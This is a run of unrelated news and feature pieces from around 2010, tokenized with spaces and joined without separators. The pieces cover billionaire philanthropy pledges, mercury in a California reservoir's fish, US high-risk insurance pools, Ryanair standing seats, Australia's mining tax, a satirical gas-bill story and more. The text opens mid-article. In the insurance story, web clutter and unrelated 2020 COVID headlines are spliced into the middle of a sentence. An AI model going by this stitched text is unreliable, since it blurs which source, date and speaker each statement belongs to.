“ We agree with Andrew Carnegie ’s wisdom that ‘ The man who dies rich , dies disgraced , ’ and we also believe ‘he who gives while he lives also knows where it goes , ’ ” the couple said .
“ Philanthropy is unbelievably rewarding . ”
Lenfest has already given away more than $ 800 million , or about 65 percent of his fortune , a spokeswoman said .
The amount pledged by Doerr and Morgridge was not immediately available .
In a letter posted on the campaign ’s website , www.givingpledge.org, Buffett said he “ could n’t be happier ” with his 2006 decision to give away 99 percent of his wealth to the Bill & Melinda Gates Foundation and family charities .
“ Now , Bill and Melinda Gates and I are asking hundreds of rich Americans to pledge at least 50 percent of their wealth to charity , ” Buffett , 79 , said .
He said that so far about 20 percent of his Berkshire Hathaway shares , including shares given by his late wife Susan , had been distributed to charity and that he would continue to distribute annually 4 percent of the shares he retains .
SPENDING ON CURRENT NEEDS
“ At the latest , the proceeds from all of my Berkshire shares will be expended for philanthropic purposes by 10 years after my estate is settled .
Nothing will go to endowments ; I want the money spent on current needs , ” Buffett wrote .
Gates was ranked the second richest man in the world by Forbes magazine this year with $ 53 billion , while Buffett came in at No. 3 with $ 47 billion .
Forbes said the United States is home to 403 billionaires , the most in the world .
Bill and Melinda Gates have so far given more than $ 28 billion to their foundation .
Since the foundation began in 1994 it has given away more than $ 22 billion for health improvements in poor countries and to improve access for Americans to opportunities they need to succeed in school and life .
The Giving Pledge will not accept any money ; it is simply asking billionaires to make a moral commitment to give away their wealth to charity .
While the campaign is targeting billionaires , the Giving Pledge said it is “ inspired by the example set by millions of Americans who give generously ( and often at great personal sacrifice ) to make the world a better place . ” ( Editing by Eric Beech and Cynthia Osterman )
Your browser is obsolete .
Please upgrade it for free to improve its performance
and so have a better comfort of browsing .
When researchers wanted to test largemouth bass at Lower Crystal Springs Reservoir for mercury levels , the reservoir 's managers in San Francisco figured the scientists were simply looking for a clean sample to compare with toxic results at other spots .
Instead , the study showed that the fish in the San Mateo County lake - which collects rainwater as well as water piped in from Yosemite 's Hetch Hetchy reservoir - had some of the highest mercury levels in the state .
Now , the San Francisco Public Utilities Commission , which oversees Crystal Springs and the rest of the sprawling network that supplies drinking water to 2.5 million people in San Francisco , San Mateo , Santa Clara and Alameda counties , is trying to find the source of the heavy metal , a neurotoxin that can cause developmental damage in children and brain , lung and kidney problems in adults .
" It was a big surprise , " said Tim Ramirez , manager for natural resources and land management at the commission 's water enterprise division .
" We 're going to jump on it and try to find out what 's going on . "
No swimming
Mercury contamination in predator fish like the bass does not indicate that the water itself is unsafe for drinking or swimming - though the 22.6 million - gallon Crystal Springs has long been off - limits to swimming , fishing and boating to protect drinking water quality .
The naturally occurring mineral becomes hazardous when it interacts with bacteria that thrive in low - oxygen environments .
The bacteria change the mercury into methyl mercury , which is consumed by microscopic organisms at the low end of the food chain .
As each creature is in turn eaten by a bigger creature , the mercury becomes more concentrated .
The study was done by researchers at the San Francisco Estuary Institute , who released the results of the landmark , $ 1.5 million , two - year project in June .
They sampled sport fish at nearly 300 popular fishing lakes in California for methyl mercury , PCBs , DDT and other contaminants .
Twenty - one percent of the lakes , including Crystal Springs , had at least one fish species with mercury concentration above 0.44 parts per million - a level considered unsafe for ingestion by young children and women of child - bearing age .
Less than 1 percent of the lakes had similar levels of PCBs , a set of highly noxious chemicals now banned but once used commonly in electronic components and coolants .
Understanding risks
The data is the first step in a broader effort to understand chemical pollution in California 's lakes , as well as risks it poses to humans and wildlife .
At many of the lakes , the mercury results were n't wholly unexpected .
San Jose 's Almaden Lake , which had the highest fish mercury levels in the state , is in a geological zone rich with mercury , extracted during the 1800s for its ability to bind with gold .
Fishing is allowed at Almaden , but signs in several languages warn against eating fish pulled from that lake and others in the area .
To help control mercury levels at Almaden , the Santa Clara Valley Water District is aerating the water - adding oxygen to reduce the bacteria that mixes with mercury to form the toxic methyl mercury .
The Crystal Springs watershed , however , does n't have a history of mercury mining , said the report 's lead author Jay Davis , senior scientist at the institute .
" It is one of the more contaminated lakes in a pristine watershed , " he said .
Pollution from afar
Mercury in the Crystal Springs area may be coming from a source other than local sediments , according to Davis and Ramirez .
Both men theorize that instead of leaching out of rocks and soil , the mercury may be wafting across the Pacific Ocean from China .
China relies heavily on energy from coal - fired plants , a major source of mercury pollution .
" It 's still possible that geology in the ( Crystal Springs ) watershed could contribute to the contamination we see , but it seems like a case where atmospheric deposition might play a role , " Davis said .
Through the institute 's partnership with the State Water Resources Control Board , scientists will continue to monitor the mercury levels in fish at Crystal Springs and elsewhere .
The San Francisco PUC , meanwhile , is consulting with other regional water and land management agencies about the Crystal Springs results .
Ramirez said the utility is particularly interested in air - monitoring programs in the Central Valley that are tracking west - to - east air pollution patterns .
" It 's not of immediate concern to people right now , but we want to know what 's happening , " Ramirez said .
" That said , if it 's airborne pollution from a global source , that 's going to be hard for us to do something about . "
The Obama administration has not ruled out turning sick people away from an insurance program created by the new healthcare law to provide coverage for the uninsured .
Critics of the $ 5 billion high - risk pool program insist it will run out of money before Jan. 1 , 2014 .
That ’s when the program sunsets and health plans can no longer discriminate against people with pre-existing conditions .
ADVERTISEMENT
Administration officials insist they can make changes to the program to ensure it lasts until 2014 , and that it may not have to turn away sick people .
Officials said the administration could also consider reducing benefits under the program , or redistributing funds between state pools .
But they acknowledged turning some people away was also a possibility .
“ There ’s a certain amount of money authorized in the statute , and we will do our best to make sure that that amount of money insures as many people as possible and does as much good as possible , ” said Jay Angoff , director of the Office of Consumer Information and Insurance Oversight at the Department of Health and Human Services ( HHS ) .
“ I think it ’s premature to say [ what happens ] when it ’s gone . ”
The administration has not discussed asking Congress for more money down the line if the $ 5 billion runs out before Jan. 1 , 2014 .
Uninsured sick people could start applying for participation in the high - risk insurance pools on Thursday .
Healthcare experts of all stripes warned during the healthcare debate that $ 5 billion would likely not last until 2014 .
Millions of Americans cannot find affordable healthcare because of their pre-existing conditions , and that amount would only cover a couple hundred thousand people , according to a recent study by the chief Medicare actuary .
Republicans continued to hammer that point on Thursday , asking HHS officials to brief them about the program .
We are “ deeply concerned that these pools may not provide quality coverage or will limit enrollment , ” Reps . Joe Barton ( R - Texas ) , John Shimkus ( R - Ill . ) and Michael Burgess Michael Clifton BurgessIgnore the misinformation :
The FDA will ensure the safety of any COVID - 19 vaccine House goes postal for one day GOP lawmaker calls asymptomatic testing crucial after CDC revises guidance MORE ( R - Texas ) , the ranking members on the Energy and Commerce panel and its health and oversight subcommittees , wrote in a letter to HHS Secretary Kathleen Sebelius Kathleen SebeliusSpecial counsel investigating DeVos for potential Hatch Act violation : report The Hill 's Coronavirus Report : Mike Roman says 3 M on track to deliver 2 billion respirators globally and 1 billion in US by end of year ; US , Pfizer agree to 100 M doses of COVID - 19 vaccine that will be free to Americans The Hill 's Coronavirus Report : Former HHS Secretary Sebelius gives Trump administration a D in handling pandemic ; Oxford , AstraZeneca report positive dual immunity results from early vaccine trial MORE .
The letter requests a briefing on high - risk pools by July 15 , particularly on three topics : protections and services in place “ to make sure that access is efficient and unimpeded ; whether HHS believes the program is financially sustainable through 2013 ; and details about how each state ’s pool will be administered and what options they ’ll have available . ”
Leading health reform advocate Ron Pollack , founding executive director of Families USA , said the pools were a “ very imperfect tool that could be implemented quickly ” but were the best option available for the interim period before 2014 .
“ The pools are going to be helpful for a significant number of people , ” he told The Hill , “ but nobody thought they ’re the ultimate answer for helping people with pre-existing conditions . ”
Still , he did n’t rule out that Families USA could press lawmakers to allocate more money in a few years if it looks like the program needs it .
Each state has a certain budget allocation for its pool , and the first step to stay under budget would be to shift money around between states that do n’t see a lot of applicants and those that do , said Richard Popper , deputy director of the Office of Consumer Information and Insurance Oversight at HHS .
ADVERTISEMENT
“ If we have that situation where we have strong demand in one state and not as strong demand in another state , the secretary of HHS after a year or two has the authority to reallocate the funding , ” said Popper , who used to run Maryland ’s high - risk pool .
“ Along with that , we can work with the states to adjust their benefit structure , the deductibles , the co-pays , the overall plan structure to address some of those cost drivers , again to help the plan make it to 2014 , when it will no longer be needed . ”
In addition , Popper said , many people wo n’t be able to afford to participate in the program since premiums will range between about $ 140 and $ 900 a month , depending on applicants ’ age and where they live .
HHS estimates that at least 200,000 people will be in the program at any one time .
To be eligible , applicants have to be citizens or nationals of the United States or be lawfully present ; have a pre-existing medical condition ; and have been uninsured for at least six months before applying for the high - risk pool plan .
“ There are going to be meaningful premiums that are going to be required to stay in this plan — premiums in the hundreds of dollars every month , ” Popper said .
“ There are a significant number of people out there with pre-existing conditions who are uninsured , but a significant number of those people ... also have limited income .
And some of them , while they may need this plan , the premiums may not be something they can afford .
“ We have that to think about as well , ” he added .
“ But for those who can afford it , this is going to be a great , great plan . ”
If it looks like too many people are signing up — states will get monthly updates on how many people they can cover with the money they have left — there ’s always the option of turning people down .
The bill “ does give the secretary authority to limit enrollment in the plan ... nationally or on a state - by - state basis , ” Popper said .
“ So that is present , but at this point , we ’re starting with no one in the plan as of today ... so we do n’t see that happening anytime soon . ”
Ryanair is planning to run flights where passengers stand during the journey at a cost of just € 5 per ticket .
Michael O'Leary , the airline 's chief executive , set out proposals that also include charging customers to use the loo .
A standing area with " vertical seats " will be introduced at the back of its fleet of 250 planes .
He said that charging customers € 1 to make use of facilities would encourage travellers on one hour flights to use lavatories at the airport instead of on the aircraft .
The Irishman said he intended to introduce coin-operated loos and added : " The other change we 've been looking at is taking out the last 10 rows of seats so we will have 15 rows of seats and the equivalent of 10 rows of standing area . "
A Ryanair spokesman said that Boeing had been consulted over refitting the fleet with " vertical seats " which would allow passengers to be strapped in while standing up , which would cost between € 5 and € 10 per person .
Safety testing will be carried out next year .
However , a spokesman for the Civil Aviation Authority said the plans would struggle to meet safety requirements .
He said : " It 's aviation law that people have to have a seat - belt on from take - off and landing so they would have to be in a seat .
I do n't know how Mr O'Leary would get around that one .
During turbulence passengers also have to have a seat - belt on . "
Mr O'Leary was interviewed for ITV's How to Beat the Budget Airlines which airs on Thursday night at 7.30 pm .
Telegraph.co.uk
PCG have just put up four screens from the new Deus Ex 3 trailer which will debut on the 4th .
As in , Friday .
They ’re also bragging about 21,500 ( Count ’em ! ) words of preview , which hopefully are all different , and not just Tom Francis cutting and pasting the same paragraph again and again and again .
As is his wont .
Anyway , go look here or skip below to get my initial impressions .
Picture 1 :
Well , we know these are from the trailer , but we do n’t know if they ’re in - engine or out of engine .
Ooh – I dunno .
I suspect it ’ll be out of engine , but you really do n’t know in this day and age .
Anyway – a bloke in shades staring through a hole in the wall .
This shows that shades will feature prominently .
Also , blokes .
The hole in the wall may hint towards some kind of destructible scenery or – more likely – being a metaphorical hole , referencing Neitzches famous maxim about not gazing into the abyss in case the abyss gazes into you .
Of course , from the perspective of the shot , WE are the abyss .
As such , we can assume that this is a j’accuse aimed directly at the heart of early 21st Century Consumerism .
Picture 2 :
We can a couple of other dudes joining our dude in shades .
The hole in the wall is nowhere to be scene , its absence being a statement of belief in the future , the idea that the hole is n’t necessarily a part of existence , but something we can move past .
One of the dudes is getting shot .
The other dude is not getting shot .
Since they ’re either side of our lead , I can only assume this is a reference to the Calvary scene in the bible , with one of the men ( having rejected Jesus ) missing eternal life ( i.e. “ Dying ” ) and the other ( having accepted him ) keeping it .
JC=Jesus Christ , etc .
It ’s all so obvious .
Also note JC has a sort of robo-arm thing , I think , which is a metaphor for something so clever that if I explained it to you , you ’d never understand .
I will save it for my second book .
Picture 3 :
Ah – here ’s a little fan - service .
This exploding helicopter is clearly a referencing to the famous helicopter bomb sequence .
This sort of thing is what gives everyone complete and absolute confidence the game ’s going to be okay .
No , really .
It ’s all going to be fine .
Picture 4 :
Deus
Ex will be featuring skyboxes .
Simple measures such as turning electrical appliances off at the mains and installing energy - efficient lightbulbs could slash the UK 's carbon dioxide emissions by about 40 megatonnes a year , or up to one third , according to new research which says that cutting electricity consumption is up to 60 per cent more effective than previously thought .
Such basic lifestyle changes would be the equivalent of removing about 10 large gas - fired power stations from operation .
The calculations , which come from the highly regarded Grantham Institute for Climate Change at Imperial College London , suggest that the Government has vastly underestimated the potential savings from encouraging people to use less electricity .
Adam Hawkes , a visiting fellow at the Grantham Institute , told The Independent on Sunday yesterday that the Government misjudged potential greenhouse gas savings because it failed to allow for the fact that different types of power stations emitted different amounts of CO2 .
" The Government uses average emissions rates , but when you do have a small change in demand , it 's the power stations that have a higher carbon intensity such as coal and gas that respond .
So it 's the emissions rates of those power stations that you should use to calculate how much you 'd save [ if you used less electricity ] , rather than an average that includes nuclear and wind power stations . "
Dr Hawkes 's findings could be crucial in helping to kickstart many households ' faltering efforts to conserve energy , experts believe .
They come just weeks after the Government admitted Britain will fail to meet its 2010 target for cutting CO2 emissions : a pledged 20 per cent reduction on 1990 CO2 levels is likely to be missed by a wide margin .
By the end of 2008 , emissions had come down by 10 per cent .
Ben Castle , strategy manager at the Energy Saving Trust , a lobby group that campaigns to cut greenhouse gases , said : " It 's a very interesting piece of research .
Small , no - cost behaviours in the home really add up . "
Martyn Williams , a climate change campaigner at Friends of the Earth , said : " In light of this , the Government should be redoubling its efforts to curb carbon emissions .
Smart meters will help , as well as smart billings to tell people what areas they need to cut back on . "
Caroline Lucas MP , the leader of the Green Party , said : " The Green Party welcomes this research , which helps shed further light on the potential to cut CO2 emissions from energy use in the home .
We need to step up public information about climate change and about the need to take simple measures like switching off unwanted lights .
Pump out more information and we 'll pump out fewer emissions .
" But it 's clearly not enough to just encourage people to cut their energy use .
The Government should take every step it can , for instance by banning the fitting of stand - by switches to televisions and by enforcing tighter regulations on the energy - efficiency of electrical goods and by setting higher energy standards for homes .
Those are actions that would cost nothing and hurt no one , but would have a significant impact on overall energy use . "
Dr Hawkes said his new estimates showed that turning off all appliances at the mains when going to bed or on holiday would save around 100kg of CO2 per year ; installing 10 energy - efficient lightbulbs would save up to 350 kg of CO2 per year ; and hanging out wet washing to dry rather than using tumble dryers would save 260 kg of CO2 per year .
" If every house [ took these steps ] , we 'd save about 40 megatonnes of CO2 a year , which is the equivalent to the annual CO2 production of about seven million houses [ a third of all households ] in the UK – that 's a lot ! " he said .
The scientist , who works for the energy and climate change consultancy AEA Technology , based his study on the output of all UK power stations between 2002 and 2009 .
He said his findings showed the figure used by scientists advising the Government on the best ways to reduce electricity was 60 per cent lower than the actual rates observed , which meant that " policy studies are underestimating the impact of people reducing their energy use " .
A spokesman for the Department for Energy and Climate Change defended its figures : " The Government believes that its estimates of marginal electricity emissions factors are soundly based .
Our figures are lower than those of the Imperial study , because Imperial uses historical data , and because new power plants are more efficient and less carbon - intensive than older power stations . "
However , the study is likely to influence political thinking on the issue , particularly as Chris Huhne , the Energy and Climate Change Secretary , said this weekend that Britons need to wean themselves off their " addiction to fossil fuels " .
He warned : " Inaction is not a option ...
The cheapest way of closing the gap between energy demand and supply is through energy - saving measures [ such as ] smart meters and smart grids that give consumers control over their appliances , curb energy waste and save money . "
Additional reporting by Jonathan Owen and Sanna Chu
Case study : Saving money the easy way
John and Eriko Elford and their daughter Amalia , of Totnes , Devon .
" We 've had low - energy lightbulbs ever since they came out , seven or eight years ago .
I think they 've definitely saved us money ; our electricity bill is about £ 200 - £ 220 a year .
They 're dearer , but the money you save in the end is worth it .
We turn off lights when not using them .
My daughter needs encouraging , but she does turn some things off .
I always turn the TV off at the wall .
There 's not much we leave on stand - by except the computer router and my wife 's electric toothbrush . "
Two types of research groups are extending the boundaries of low - power wireless devices , said Brian Otis , an assistant professor of electrical engineering at the University of Washington .
Some researchers are working to reduce the power required by the devices ; others are learning how to harvest power from the environment .
“ One day , ” Professor Otis said , “ those two camps will meet , and then we will have devices that can run indefinitely . ”
Professor Otis , who designs and deploys integrated circuits for wireless sensing , is in the first group .
Dr. Smith of Intel is one of the harvesters , gathering radio power that is now going to waste .
And there are plenty of radio waves in the air to provide fodder for him as they spread from Wi -Fi transmitters , cellphone antennas , TV towers and radio stations .
Some of the waves travel to living - room televisions , for example .
But others , which would otherwise be wasted as they rise through the atmosphere into space or are absorbed in the ground , can be exploited , he said .
“ Ambient radio waves , ” he said , “ can already provide enough energy to substitute for AAA batteries in some calculators , temperature and humidity sensors , and clocks . ”
At Intel , Dr. Smith , working with the researcher Alanson Sample of the University of Washington , created an electronic “ harvester ” of ambient radio waves .
It collects enough energy from a TV station broadcasting about 2.5 miles from the lab to run a temperature and humidity sensor .
The device collects enough power to produce about 50 microwatts of DC power , Dr. Smith said .
That is enough for many sensing and computing jobs , said Professor Otis .
The power consumption of a typical solar - powered calculator , for example , is only about 5 microwatts , he said , and that of a typical digital thermometer with a liquid crystal display is one microwatt .
DR . SMITH and his colleagues have built a second device , powered by radio waves , that collects signals from an outdoor weather station and transmits them to an indoor display .
The unit can accumulate enough energy to send an updated temperature every five seconds .
Dr. Reynolds of Duke has long been interested in electronics and wireless equipment .
One company he helped found , Zensi , developed a system to sense the amount of electricity used by home appliances ; Zensi was bought by Belkin , an electronics concern .
Many electronic devices are limited by batteries that fade away or can’t survive temperature extremes , he said .
But , he added , “ we are on the cusp of an explosion in small wireless devices ” than can run on alternatives to battery power .
“ Devices like this can live on and on , ” he said .
The US Chamber of Commerce launched a political broadside against Democrats and the Obama administration Wednesday , accusing the administration of harming the economy through its health care reform and financial reform agendas .
“ Instead of continuing their partnership with the business community and embracing proven ideas for job creation , they vilified industries while embarking on an ill - advised course of government expansion , major tax increases , massive deficits , and job - destroying regulations , ” the Chamber said in an open letter ( PDF ) to the president .
In a surprisingly confrontational interview , Betty Liu of Bloomberg TV grilled Chamber President Tom Donohue over the increasingly bitter , partisan tone of his chamber ’s communiques .
“ Is this [ jobs ] summit just to air what you think has gone wrong , or is there really going to be anything solid coming out of this ? ”
Liu asked .
“ We ’re not airing any grievances with the White House , ” Donohue said , arguing that his chamber wants to bring attention to job - creation policies .
“ Did you invite White House officials to speak at this summit ? ” Liu asked .
“ No , we did n’t , ” Donohue replied .
“ We regularly invite White House officials to participate in our activities , often they do n’t come .
The cabinet secretaries come .
Although the president was over the other day when the the president of Russia was here …. ”
Pressed again by Liu to explain why the Chamber would n’t want White House officials at their jobs summit , Donohue said the Chamber has “ a very full agenda ” and needs to concentrate on activities like “ giving awards to job creators throughout the country . ”
( Source : RawStory.com )
Enlarge By Mead Gruver , AP Grand Teton National Park spokeswoman Jackie Skaggs strolls a section of state land in the park .
MOOSE , Wyoming ( AP )  For Sale : Part of Grand Teton National Park .
Majestic views of the Teton Range .
Prime location for luxury resort , home development .
Pristine habitat for moose , elk , wolves , grizzlies .
Price : $ 125 million .
Call : Gov. Dave Freudenthal .
Wyoming is trying to force the Interior Department to trade land , minerals or mineral royalties for 1,366 acres it owns within the majestic park .
If the foot - dragging feds do n't agree to a deal — soon — Freudenthal threatens to put a For Sale sign on the property .
Wyoming has owned the land since statehood in 1890 , when the federal government set aside land in new Western states to be mined , logged or leased to raise money for public education .
Wyoming kept its so - called " school sections " after Grand Teton National Park was established in 1950 .
The state has tried for a decade to negotiate some kind of trade .
Saying that his patience is running out , Freudenthal , a Democrat , sent an ultimatum recently to park Superintendent Mary Gibson Scott .
" I think he wants to pound the ( for sale ) sign in himself , " said Ed Grant , director of the Office of State Lands and Investments .
Wyoming gets just $ 3,000 a year from the land by leasing it for cattle grazing .
Sold with the proceeds invested at 3 % , the land easily could bring in $ 3.75 million a year .
The state constitution requires state officials to manage state lands for maximum profit .
Their oaths of office require them to act .
" If it 's to recreate on , or if it 's a new ski lodge , highest and best use , " said Susan Child , deputy director of the state lands office .
" It 's obviously not grazing . "
Even in pro-development Wyoming , however , selling off land in a national park is n't a popular idea .
Some are protesting already .
But Freudenthal , who has a long history of run-ins with the Interior Department over endangered species and snowmobiles in Yellowstone National Park , is n't stepping on any toes he has n't smashed already .
What 's more , he 's wrapping up his second term and will leave office next year .
He 's all but enshrined as one of the most popular governors in Wyoming history .
" We 're going to continue to push on it , " he said .
" Somehow we 've got to get some attention . "
Freudenthal certainly has grabbed the park's .
" These are wildlife - rich habitats completely surrounded by pristine park land , " said park spokeswoman Jackie Skaggs .
" For obvious reasons , Grand Teton National Park would be very , very concerned and disappointed if these lands were sold for development . "
A deal would n't be unprecedented : Utah in 1999 worked out an elaborate swap involving nearly 600 square miles of state land within several national parks , monuments and recreation areas .
The state got $ 50 million plus 240 square miles of federal land in return .
In 2003 , Republican Sen. Craig Thomas got a bill passed that was supposed to encourage some kind of swap in Grand Teton .
But Thomas died in 2007 and a deal has been elusive .
The Interior Department continues to work with Wyoming to resolve the matter , said Interior spokeswoman Kendra Barkoff .
Both sides are working on getting an updated appraisal for the state land .
A 2005 appraisal put the land 's value at $ 98.5 million .
Wyoming officials figure it's now worth between $ 100 million and $ 125 million .
The land consists of two parcels of a square mile each plus a handful of other lots .
All are in the southern end of Grand Teton with views of the world - famous Teton Range .
Copyright 2010 The Associated Press .
All rights reserved .
This material may not be published , broadcast , rewritten or redistributed .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
Want your own colour - coded bookshelf but do n’t have enough cash , time , or books ?
We have the perfect solution … check out this great vintage style bookshelf poster – it ’s not colour - coded , but it ’s the best we can do : “ Posters : Bookshelves Poster Photo Wallpaper – Bookshelf 2 - Parts ( 87 x 36 inches ) “ .
Related
BOSTON — Some kind of raving psychopath apparently gnawed through his restraints and burrowed out of the Massachusetts Center For The Criminally Insane to design the invoice for the Keystone Gas Company , 36 - year - old Michael Beasley reported Monday .
The gas bill that Beasley ( inset ) received .
Advertisement
" What animal did this ? " said Beasley , paging through a bill for the pay period ending June 2 .
" Whoever he is , he 's spread an invoice for less than $ 15 over nine pages . "
The new bill divides Beasley 's balance into 15 columns with such headings as " meter degree " and " date expenditure . "
The columns are annotated with footnotes , bar graphs , windows , explanations , and " hints , " many of which are printed in colors that were obviously selected by a deranged person .
Advertisement
" I just want to know what I owe ! " Beasley said .
" Fuel cost adjustment , adjustment to minimum bill , read days , repair range …
' Helping you to understand your repair range ' ?
Is this some kind of sick joke ? "
Beasley pointed to a section of the bill that detailed payments by mail .
" Residential Monthly Billing Customer Acct . ID B0498-8194-330000 -MICHAEL-BEASLEY , " the bill read .
" Affix DEGREE DATE / Meter -ACT - 4 stamp ( Window 11 - B ) to Monthly BILLING ID Box ( located on Window 15 on outside of Payment Envelope provided by RMBRC packet ( See Intro ) ) .
RMB
Customers using their own envelope see Using Your Own Envelope ( Section F ) . "
Advertisement
" There 's actually a section on how to use your own envelope , " Beasley said .
" With rules . "
Beasley added : " This is n't a gas bill — it 's a cry for help .
Authored by someone with a disease . "
Advertisement
Gale Snow , Keystone Gas public relations director , encouraged customers who are confused by the new bill to refer to the " Understanding Your New Gas Bill " brochure .
" This thing ? " said Beasley , holding up a copy of the 28 - page brochure .
" This madhouse ?
This 24 - Hour Polka Marathon at Titicut Follies ?
Look at it , man .
It 's a 28 - page annotation of a gas bill .
The notes to my copy of ' The Waste Land ' are n't this arcane . "
Advertisement
" Maybe it was written by someone the gas - bill designer befriended at the asylum , " Beasley added .
The designer of the new gas bill — and possibly the author of its accompanying brochure — was unavailable for comment , probably because he 's curled up naked in the crawlspace between floors three and four of Children 's Hospital Boston , subsisting on vending - machine candy and doodling with his own feces .
It seems that aspic has always been with us .
Jelly covered piles of carved food are an excellent visual shorthand for absurdly poncey cuisine .
Advertising pictures of aspics published by gelatine companies in the 50s are some of the most abidingly horrific ever taken and still have the power to appal to this day .
' Set in aspic ' is so useful a metaphor , with its overtones of outdated convention that it 's entered our national canon of cliche .
Yet how many of us have ever eaten one ?
For as long as cheap cuts have been boiled , cooks have been aware of the useful jelly created which , allowed to set around the cooked meat stopped air and bacteria from reaching it and could delay putrescence .
It was Carême , the man who believed that cookery was a sub - discipline of architecture , who turned a simple kitchen trick into an art form .
Really cartilaginous pale meats - veal knuckle and pig trotter being the best examples - yield a clear , strong jelly with little marked taste .
Carême would flavour this with clear consommes to make the setting medium for his creations .
Like many cookery terms of the time ' aspic ' has confused roots .
In the 18th century it referred to the whole dish , with some sources claiming that ' aspic ' compared to the bright , jewel like colours to those of an asp or snake .
In later years , aspic came to mean the jelly medium itself .
Aspics really fired the public imagination during the industrial revolution .
Gelatin was a by - product of mass animal processing , being extracted along with glue and fertiliser from bones , hooves , hides and tails .
Like Marmite , a brewing by - product , it required only the power of advertising to turn this waste into money .
Gelatine processors were assiduous suppliers of demonstrations , free samples , books and pamphlets which suggested setting almost anything in jelly .
In the early days it was most often fruit , chicken or perhaps sliced cold meat which could be encapsulated but by the 50's , particularly in America where a newly affluent middle - class sought innovation , suggestions started to appear for jellied hotdogs or even canned tuna in lime ' Jello ' .
It 's this last sort of madness which probably put an end to the age of aspics - there is something uniquely challenging to the modern palate about savoury jellies .
It 's difficult to imagine how a whole chicken ' chaud - froid ' ( covered with a layer of aspic with cream creating the effect of a thick white condom ) would go down in a modern restaurant setting .
Oeufs en gelée , the great French bistro classic of poached eggs in aspic , is currently experiencing a bit of a revival yet the experience of biting through pork pie jelly into a warm yolk can be , to say the least , polarising to the British palate .
When AA Gill tried one recently at Aqua Nueva it caused him to write the most horribly memorable line in the last decade of British restaurant criticism " … it was like a big wine gum of pus , only not that nice . "
Though it 's still with us in spirit , aspic has pretty much passed from our collective menu , victim of excessive commercial exploitation and easy visual jokes - yet it seems like it might be fun and I 'd love to give it a go .
Have you tried aspic ?
Does the idea appeal to you and do you think it 's a dish worth reviving ?
The Federal Government has agreed major concessions with the mining industry in a redesign of its controversial super profits tax .
The changes , announced by Prime Minister Julia Gillard this morning , include reducing the headline rate of the tax from 40 per cent to 30 per cent .
Tax renamed the Minerals Resources Rent Tax
Tax renamed the Minerals Resources Rent Tax Will only apply to iron ore and coal
Will only apply to iron ore and coal Iron ore and coal will now be subject to a new tax at a rate of 30 pc instead of the original 40 pc
Iron ore and coal will now be subject to a new tax at a rate of 30 pc instead of the original 40 pc
Tax will kick in at the government bond rate plus 7 per cent , which would be around 12 per cent
Tax will kick in at the government bond rate plus 7 per cent , which would be around 12 per cent Oil and coal seam gas to be rolled into the existing Petroleum Resources Rent Tax and taxed at 40 pc
Oil and coal seam gas to be rolled into the existing Petroleum Resources Rent Tax and taxed at 40 pc Changes mean the Government loses $ 1.5 billion of expected revenue
" We 've been stuck on this question as a nation for too long , " Ms Gillard told a press conference in Canberra this morning .
" Today we 're moving forward together ...
It 's also essential we have a stable and a coherent Government and a positive basis for trust , and I believe we have established that this week . "
Today 's agreement , after intensive discussions with Rio Tinto , Xstrata and BHP Billiton in Canberra this week , ends a two - month brawl with the resources sector which contributed to Kevin Rudd 's ousting as prime minister .
Ms Gillard was keen to distance the rebranded tax regime from the old resources super profits tax .
" There will be a Government profit - based tax regime , but there will be no resources super profit tax , " she said .
" It will maintain Australia 's standing as a competitive and attractive destination for investment . "
Treasurer Wayne Swan was quick to heap praise on Ms Gillard for securing the deal .
" I think it 's fair to say that her intervention changed the tone of this debate and has led to this breakthrough , " he said .
" It is a better tax for the consultation , it is a better tax for the negotiation . "
The revamped tax will now only apply to a few hundred companies instead of the thousands that would have been liable under its predecessor .
Former BHP chair Don Argus will head a consultation panel with Resources Minister Martin Ferguson to hammer out the final details of the deal .
BHP Billiton and Rio Tinto have issued statements welcoming the new tax proposal , but they say there is still much work to be done on its design before it takes effect .
Minerals Council of Australia chief executive Mitch Hooke called a the deal " a positive outcome for Australia and the Australian minerals industry " but said there was still unfinished business " to be worked through .
The CFMEU mining union has applauded the deal , with national president Tony Maher calling it a " huge win " for the community .
The Government says the price of iron ore has increased by 400 per cent and black coal by 200 per cent since the beginning of the mining boom .
The exploration rebate has been scrapped as has the measure that would have seen the Government share 40 per cent of the risk of projects .
Companies can also use the market value for their assets in assessing their taxable income , an area which was a key concern for the miners .
The tax was supposed to fund a 2 per cent cut in the company tax rate , but the changes now mean there will only be a 1 per cent cut .
However the boost in compulsory superannuation contribution from 9 to 12 per cent will remain .
The resolution of the stand - off with the big miners is likely to increase speculation that an election will be called soon .
The legislation for the tax still needs to go through Parliament but will not be introduced until after the election , and the tax is not due to start until 2012 .
The Federal Opposition has vowed to block the tax but the deal with the industry is likely to put it under pressure to state whether it would repeal the tax if it came to office .
Deputy Opposition Leader Julie Bishop has accused the Government of a backflip .
" What was most disturbing about that press conference was seeing the co-authors of the original bad tax policy still spinning the same lines about getting the balance right and consulting further , " she told ABC2 News Breakfast .
" This just adds to the uncertainty .
Nothing has been achieved at all other than the Government 's backflipped on a number of core issues . "
Queensland mining magnate Clive Palmer was unmoved by the change to a 30 per cent tax rate and urged the opposition to stand firm in its opposition to the tax .
" These people just do n't seem to learn , that 's not how you grow the economy , " he told Sky News .
" A tax never created any jobs or provided an income for any family . "
Greens Leader Bob Brown says the Government has made a " monumental backdown " which has served the interests of the big miners .
" In the future this is going to strip billions out of budgets , which would be going to the welfare of all Australians , " he said .
Senator Brown says the Greens will scrutinise the legislation when it comes before Parliament .
Singer will be joined by Michael Gambon , known to children from the Harry Potter films , in 60 - minute special episode
This article is more than 10 years old
This article is more than 10 years old
Welsh singer Katherine Jenkins is to appear in this year 's Doctor Who BBC1 Christmas special in her first major acting role .
In what the show 's lead writer Steven Moffat told MediaGuardian will be " the most Christmassy Christmas special " since the hit family drama series returned to British TV in 2005 , Jenkins will be joined by acting grandee Michael Gambon in the 60 - minute special episode .
The 69 - year - old Gambon starred as Philip Marlow in Dennis Potter 's acclaimed 1980s BBC TV serial The Singing Detective and more recently played the headmaster Albus Dumbledore in the Harry Potter film series .
" Michael Gambon is as distinguished an actor as I can imagine and the fact that he was Dumbledore means that he is already know to millions of children , " said Moffat .
He added that he had not known that this was Jenkins 's first major acting role before she was cast .
" She is brilliant – she is a great singer and a great performer , " said Moffat .
